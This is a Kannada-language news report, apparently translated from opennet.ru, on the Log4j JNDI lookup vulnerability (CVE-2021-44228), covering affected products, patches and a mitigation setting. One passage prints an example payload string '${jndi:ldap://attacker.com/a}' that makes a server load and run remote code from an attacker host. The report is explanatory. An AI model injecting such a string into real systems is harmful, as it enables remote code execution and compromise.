Apache Log4j, Java ಅಪ್ಲಿಕೇಶನ್ಗಳಲ್ಲಿ ಲಾಗಿಂಗ್ ಅನ್ನು ಸಂಘಟಿಸುವ ಜನಪ್ರಿಯ ಚೌಕಟ್ಟಿನಲ್ಲಿ, "{jndi:URL}" ಫಾರ್ಮ್ಯಾಟ್ನಲ್ಲಿ ವಿಶೇಷವಾಗಿ ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲಾದ ಮೌಲ್ಯವನ್ನು ಲಾಗ್ಗೆ ಬರೆಯುವಾಗ ಅನಿಯಂತ್ರಿತ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಒಂದು ನಿರ್ಣಾಯಕ ದುರ್ಬಲತೆಯನ್ನು ಗುರುತಿಸಲಾಗಿದೆ. ಬಾಹ್ಯ ಮೂಲಗಳಿಂದ ಪಡೆದ ಮೌಲ್ಯಗಳನ್ನು ಲಾಗ್ ಮಾಡುವ ಜಾವಾ ಅಪ್ಲಿಕೇಶನ್ಗಳ ಮೇಲೆ ದಾಳಿಯನ್ನು ನಡೆಸಬಹುದು, ಉದಾಹರಣೆಗೆ, ದೋಷ ಸಂದೇಶಗಳಲ್ಲಿ ಸಮಸ್ಯಾತ್ಮಕ ಮೌಲ್ಯಗಳನ್ನು ಪ್ರದರ್ಶಿಸುವಾಗ.
ಸ್ಟೀಮ್, ಆಪಲ್ ಐಕ್ಲೌಡ್, ಮೈನ್ಕ್ರಾಫ್ಟ್ ಕ್ಲೈಂಟ್ಗಳು ಮತ್ತು ಸರ್ವರ್ಗಳು ಸೇರಿದಂತೆ ಅಪಾಚೆ ಸ್ಟ್ರಟ್ಸ್, ಅಪಾಚೆ ಸೋಲರ್, ಅಪಾಚೆ ಡ್ರೂಯಿಡ್ ಅಥವಾ ಅಪಾಚೆ ಫ್ಲಿಂಕ್ನಂತಹ ಫ್ರೇಮ್ವರ್ಕ್ಗಳನ್ನು ಬಳಸುವ ಬಹುತೇಕ ಎಲ್ಲಾ ಯೋಜನೆಗಳು ಸಮಸ್ಯೆಯಿಂದ ಪ್ರಭಾವಿತವಾಗಿವೆ ಎಂದು ಗಮನಿಸಲಾಗಿದೆ. ದುರ್ಬಲತೆಯು ಕಾರ್ಪೊರೇಟ್ ಅಪ್ಲಿಕೇಶನ್ಗಳ ಮೇಲೆ ಬೃಹತ್ ದಾಳಿಯ ಅಲೆಗೆ ಕಾರಣವಾಗಬಹುದು ಎಂದು ನಿರೀಕ್ಷಿಸಲಾಗಿದೆ, ಅಪಾಚೆ ಸ್ಟ್ರಟ್ಸ್ ಚೌಕಟ್ಟಿನಲ್ಲಿ ನಿರ್ಣಾಯಕ ದುರ್ಬಲತೆಗಳ ಇತಿಹಾಸವನ್ನು ಪುನರಾವರ್ತಿಸುತ್ತದೆ, ಇದು ಸ್ಥೂಲ ಅಂದಾಜಿನ ಪ್ರಕಾರ, 65% ಫಾರ್ಚೂನ್ನಿಂದ ವೆಬ್ ಅಪ್ಲಿಕೇಶನ್ಗಳಲ್ಲಿ ಬಳಸಲ್ಪಡುತ್ತದೆ. ದುರ್ಬಲ ವ್ಯವಸ್ಥೆಗಳಿಗಾಗಿ ನೆಟ್ವರ್ಕ್ ಅನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುವ ಪ್ರಯತ್ನಗಳನ್ನು ಒಳಗೊಂಡಂತೆ 100 ಕಂಪನಿಗಳು.
ಕೆಲಸ ಮಾಡುವ ಶೋಷಣೆಯನ್ನು ಈಗಾಗಲೇ ಪ್ರಕಟಿಸಲಾಗಿದೆ ಎಂಬ ಅಂಶದಿಂದ ಸಮಸ್ಯೆ ಉಲ್ಬಣಗೊಂಡಿದೆ, ಆದರೆ ಸ್ಥಿರ ಶಾಖೆಗಳಿಗೆ ಪರಿಹಾರಗಳನ್ನು ಇನ್ನೂ ಸಂಕಲಿಸಲಾಗಿಲ್ಲ. CVE ಗುರುತಿಸುವಿಕೆಯನ್ನು ಇನ್ನೂ ನಿಯೋಜಿಸಲಾಗಿಲ್ಲ. ಫಿಕ್ಸ್ ಅನ್ನು log4j-2.15.0-rc1 ಪರೀಕ್ಷಾ ಶಾಖೆಯಲ್ಲಿ ಮಾತ್ರ ಸೇರಿಸಲಾಗಿದೆ. ದುರ್ಬಲತೆಯನ್ನು ತಡೆಯುವ ಪರಿಹಾರವಾಗಿ, log4j2.formatMsgNoLookups ನಿಯತಾಂಕವನ್ನು ಸರಿ ಎಂದು ಹೊಂದಿಸಲು ಶಿಫಾರಸು ಮಾಡಲಾಗಿದೆ.
ಲಾಗ್ಗೆ ಲೈನ್ಗಳ ಔಟ್ಪುಟ್ನಲ್ಲಿ ವಿಶೇಷ ಮುಖವಾಡಗಳನ್ನು “{}” ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವುದನ್ನು log4j ಬೆಂಬಲಿಸುತ್ತದೆ ಎಂಬ ಅಂಶದಿಂದ ಸಮಸ್ಯೆ ಉಂಟಾಗಿದೆ, ಇದರಲ್ಲಿ JNDI (ಜಾವಾ ನಾಮಕರಣ ಮತ್ತು ಡೈರೆಕ್ಟರಿ ಇಂಟರ್ಫೇಸ್) ಪ್ರಶ್ನೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು. ದಾಳಿಯು "${jndi:ldap://attacker.com/a}" ಪರ್ಯಾಯದೊಂದಿಗೆ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ರವಾನಿಸಲು ಕುದಿಯುತ್ತದೆ, ಯಾವ log4j ಜಾವಾ ಕ್ಲಾಸ್ಗೆ ಹಾದಿಗಾಗಿ LDAP ವಿನಂತಿಯನ್ನು attacker.com ಸರ್ವರ್ಗೆ ಕಳುಹಿಸುತ್ತದೆ . ಆಕ್ರಮಣಕಾರರ ಸರ್ವರ್ನಿಂದ ಹಿಂತಿರುಗಿಸಲಾದ ಮಾರ್ಗವನ್ನು (ಉದಾಹರಣೆಗೆ, http://second-stage.attacker.com/Exploit.class) ಪ್ರಸ್ತುತ ಪ್ರಕ್ರಿಯೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ, ಇದು ಆಕ್ರಮಣಕಾರರಿಗೆ ಅನಿಯಂತ್ರಿತ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಅನುಮತಿಸುತ್ತದೆ ಪ್ರಸ್ತುತ ಅಪ್ಲಿಕೇಶನ್ನ ಹಕ್ಕುಗಳೊಂದಿಗೆ ವ್ಯವಸ್ಥೆ.
ಅನುಬಂಧ 1: ದುರ್ಬಲತೆಯನ್ನು ಗುರುತಿಸುವ CVE-2021-44228 ಅನ್ನು ನಿಯೋಜಿಸಲಾಗಿದೆ.
ಅನುಬಂಧ 2: ಬಿಡುಗಡೆ log4j-2.15.0-rc1 ಮೂಲಕ ಸೇರಿಸಲಾದ ರಕ್ಷಣೆಯನ್ನು ಬೈಪಾಸ್ ಮಾಡುವ ಮಾರ್ಗವನ್ನು ಗುರುತಿಸಲಾಗಿದೆ. ಹೊಸ ಅಪ್ಡೇಟ್, log4j-2.15.0-rc2, ದುರ್ಬಲತೆಯ ವಿರುದ್ಧ ಹೆಚ್ಚು ಸಂಪೂರ್ಣ ರಕ್ಷಣೆಯೊಂದಿಗೆ ಪ್ರಸ್ತಾಪಿಸಲಾಗಿದೆ. ತಪ್ಪಾಗಿ ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲಾದ JNDI URL ಅನ್ನು ಬಳಸುವ ಸಂದರ್ಭದಲ್ಲಿ ಅಸಹಜ ಮುಕ್ತಾಯದ ಅನುಪಸ್ಥಿತಿಯೊಂದಿಗೆ ಸಂಬಂಧಿಸಿದ ಬದಲಾವಣೆಯನ್ನು ಕೋಡ್ ಹೈಲೈಟ್ ಮಾಡುತ್ತದೆ.
ಮೂಲ: opennet.ru